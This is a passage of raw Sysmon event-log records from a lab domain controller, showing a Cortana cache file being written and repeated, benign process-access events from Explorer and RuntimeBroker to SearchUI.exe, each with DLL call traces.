11241100x800000000000000011721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.654{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132551046113704350.txt2021-01-14 13:30:11.654 10341000x800000000000000011720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.654{08A6967A-4754-6000-1705-000000009A01}34084336C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+6468|C:\Windows\System32\SHCORE.dll+6437|C:\Windows\System32\SHCORE.dll+6327|C:\Windows\System32\SHCORE.dll+629d|C:\Windows\System32\SHCORE.dll+61aa|C:\Windows\System32\SHELL32.dll+46770|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF8021D6E18D8)|UNKNOWN(FFFFAA4CF6CB21F8)|UNKNOWN(FFFFAA4CF6CB2377)|UNKNOWN(FFFFAA4CF6CACA01)|UNKNOWN(FFFFAA4CF6CAE3CA)|UNKNOWN(FFFFAA4CF6CAC686)|UNKNOWN(FFFFF8021D3F8E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+49fdb|C:\Windows\System32\SHELL32.dll+10a26a|C:\Windows\System32\SHCORE.dll+2fedd 10341000x800000000000000011719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.654{08A6967A-4754-6000-1705-000000009A01}34084336C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+6468|C:\Windows\System32\SHCORE.dll+124a5|C:\Windows\System32\SHELL32.dll+46251|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF8021D6E18D8)|UNKNOWN(FFFFAA4CF6CB21F8)|UNKNOWN(FFFFAA4CF6CB2377)|UNKNOWN(FFFFAA4CF6CACA01)|UNKNOWN(FFFFAA4CF6CAE3CA)|UNKNOWN(FFFFAA4CF6CAC686)|UNKNOWN(FFFFF8021D3F8E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+49fdb|C:\Windows\System32\SHELL32.dll+10a26a|C:\Windows\System32\SHCORE.dll+2fedd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.623{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 